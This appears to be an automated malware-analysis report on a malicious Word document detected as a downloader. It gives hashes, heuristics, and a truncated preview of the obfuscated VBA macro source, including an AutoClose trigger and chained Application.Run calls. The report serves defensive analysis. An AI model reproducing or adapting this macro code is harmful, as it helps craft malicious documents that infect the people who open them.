Office (OOXML) malware analysis — malicious · ef64729cf6131df4

MALICIOUS

Office (OOXML)

58.2 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-05-16

MD5: 8e38ae77c152ce9c9d94e1c98361dedb SHA-1: 08c295d15d6032e7a55d317866e304a1e3670006 SHA-256: ef64729cf6131df48fdadb861e7963fd3122e884bc75bc83d34d71718843b0bb

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros, specifically triggering Auto_Close and CreateObject heuristics. The ClamAV detection 'Doc.Malware.Emooodldr-6711604-0' strongly suggests a known downloader family. The VBA script contains calls to Application.Run, indicating an attempt to execute further code, likely to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12511 bytes
SHA-256: `80982e57bd8abf6958604fcc0d879bebb3fce844b5761fe0f916703f1123dc85`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub cGwxNgpNMpIpQV() PpPIjwXEZID = "CpfY" + "ioowIGpiUTgXVLDkiiLJFRvL" + "juNBzfKTqWkJfuxYMkUIC" kAHUzQHJQp = 386.56 - Atn(890.43) - Atn(718.86) - 592.17 - 730.23 - 850.37 nfrfpcq = 552.34 + Atn(394.45) + 116.57 + Atn(314.43) + Atn(80.23) + 8.71 Application.Run "gHvJQckwqrKEHE" QDrZUADEo = Atn(183.68) - Atn(290.33) - 879.57 - 168.23 - Atn(879.66) - Atn(227.72) - Atn(934.72) - 215.53 CrLFCwWgnz = Atn(405.93) + 433.25 + 810.7 + Atn(631.46) vWiIHkTD = Left("KTciikLiKw", 8) + "nkXJqLwMQH" + Left("kALpojuJun", 2) + "VTyLGHHGP" + "HWcYKABVcKu" End Sub Sub UnGpgLqJWDUHBV() ZOGqIRqp = Atn(218.32) + Atn(998) + Atn(892.26) + Atn(244.54) + 900.82 + Atn(201.56) ixZSbRCKCdC = "BALoI" + "Iuo" + Left("jGLApgYoVu", 7) + "jHU" GpoJxpjorCS = 290.52 - Atn(770.3) - Atn(317.1) - Atn(526.12) - Atn(491.65) - Atn(806.27) KvnBCubYUpDx = Atn(405.18) + 287.55 + Atn(674.4) + 160.41 + 841.85 + Atn(308.8) FkCRXZv = "VAYYD" + "JRKwzdWvyPQXMkfoW" EwMgFDTrpiU = Left("vvACNEJcdL", 1) + "ZcWRdJUCEIJCfu" + "EYzVKZbgELwuCED" + "fZEdjzQn" Application.Run "vWoORdFiYyzvTgJwi" FFHupQN = LTrim("YDGobJoAqgqOYPLMTWXziBcCDMyZo") + "YnvoYJvIYjCSkHPB" + LTrim("FjfSKAFqSbbCRqXGRZ") ikxGgOnKfY = 153.82 + 562.66 + 914.33 + 803.55 + 323.53 + Atn(67.1) ifTTcbrpRXnc = RTrim("nLDkESAiSWxvDzwYvrZQMZ") + "DjvSrwYSvGJMg" + "FcEcjWKKTq" + "fVHdbX" popdjAyCFpop = Atn(220.37) - Atn(509.82) - Atn(685.13) - 469.66 - 79.24 QcjOXdjSMGrc = "GwdQ" + Left("JVQXbEcwEi", 7) + "ryUGXYVTrN" + "UxYRiZn" + Left("jLIvoULocO", 5) End Sub Public Function XqBjwqCqYIVzd(HkTgFHIQwvndyS, kBgRSWGEqKpBjXFMO, DUPkEcArJRBwqqdpx) bgvLnDIACWE = "Un" + RTrim("PdHjBEWQv") + "jFCAfvggUFOYOfzJAqEkgWfkEA" + "ITDWRFDTUEwyjriOCQBKnEzvkAH" njSZVpkI = LTrim("JpfKPEzczPLyuxxRJjzV") + "OcgbWdBZGx" + "OokcyPQ" + "HVSYDKGRZWBPd" nCDQjDwM = Atn(789.9) - 685.36 - Atn(455.79) - 566.47 - Atn(988) XqBjwqCqYIVzd = Replace(HkTgFHIQwvndyS, kBgRSWGEqKpBjXFMO, DUPkEcArJRBwqqdpx) TjTRyoWnJG = Left("gcXWurEjuc", 4) + "KMHyUXdBkKMU" bDWDHpD = "iDKKGDdKfLqTEYVYpSco" + "wxOMEYoWD" gppJJPoKxDLr = 916.3 + 402.59 + Atn(198.1) + Atn(775.35) HEpAJbjFPQ = "TEKF" + RTrim("LxyiUXTBbURPgQbAHQKrBACJkSLwL") + "CQJPEbvJrxrqNBoYvxwIdMzD" uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left("DPbKySiLJj", 2) PnXpwuyyuPK = Left("fwRcBCIYpp", 4) + "fqY" + "gzADcwOMiq" + "ggxI" DKYEPzOUgWfQ = RTrim("bRnvEWVLMPGjdzBEECqkH") + "oObkUIUMEqFUJQpFnRKdKybpZidAK" iFkfinDbwTU = "oIwjNBuviNdIFJzXG" + "rOTnrVjEKFyRbAZCAPPFErdAx" BiJvVvgJzqiB = "nicMEXHIrMAiFG" + "uRrBiExQNVWcwO" + Left("MARZbRHzZn", 7) FciNdoTTWK = 156.57 - Atn(899.1) EIWRdArbDp = "kN" + "vbKvLVPXEyEUduVNbZxHIuVcGFYn" zbuWODiVdfg = 871.26 - 65.49 - Atn(648.9) - Atn(338.4) - 355.25 GARfxIXiZMJ = 372.89 - 266.13 - 619.41 - Atn(274.69) yoojVXEMUS = "JwRGHDoXECLfYbE" + "IZwfrk" + "ZEBqVdZ" + Left("oUnxcwAxki", 9) End Function Sub gHvJQckwqrKEHE() DzwxcdCgQb = Left("UbfoSqJzYk", 3) + Left("YJSFyuBNIZ", 9) + "BOX" + "YxLnMM" + "SWPJGijPqUpDP" xbcIqDd = 354.39 + 569.16 + Atn(134.3) + Atn(142.24) + 187.49 OTyHRfBxBqo = 115.81 + 752.57 + Atn(489.17) + Atn(419.87) + Atn(136.35) Application.Run "JjzDBKRAXdxcBQ" zIuzHrWB = "xDCrHQY" + Left("QHzHDWIFwf", 10) + Left("JuHUNNTbVc", 6) yGQnJfCCun = LTrim("cFjPrfSXPEzAiFkMzzbMpRpWMZMwx") + "xZogrPBVokvNN" + LTrim("rPYAWFRvfuHkByPguLvLuCMbMJWMo") + "cWibVpGucuMwkAZnCDzANTzngu" + "oGiKAjYPuoL" + LTrim("OSgJFMxGbHYOywVQxvHPjvcrDOM") CjpgPoOE = RTrim("VqQDQEHRYgFgFnDufEQWM") + "YppOZGGxxbJunPpBdHOwcKZWONvJ" + "DpkgWLCOWpKTYYVqZD" + LTrim("bTzQQppqFrXTXxZOquxBkBDiVKyv") xPvMbbGkfu = 285.88 - 944.16 - 663.6 - 911.65 - 656.52 ScivPji = "YAEScRPnFEGRgrqiPrMjkro" + "KHbHxBkTnVyYDxS" End Sub Sub AutoClose() GiqNxBBn = 660.2 - 516.81 - 972.76 - Atn(120.29) cURkRGDOMRu = 700.29 - 932.38 - Atn(529.26) - A ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	36864 bytes
SHA-256: `236197081feee7d3469111c78c54244edc2491c8521fe90c6a1ab0dc0a77c94d`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.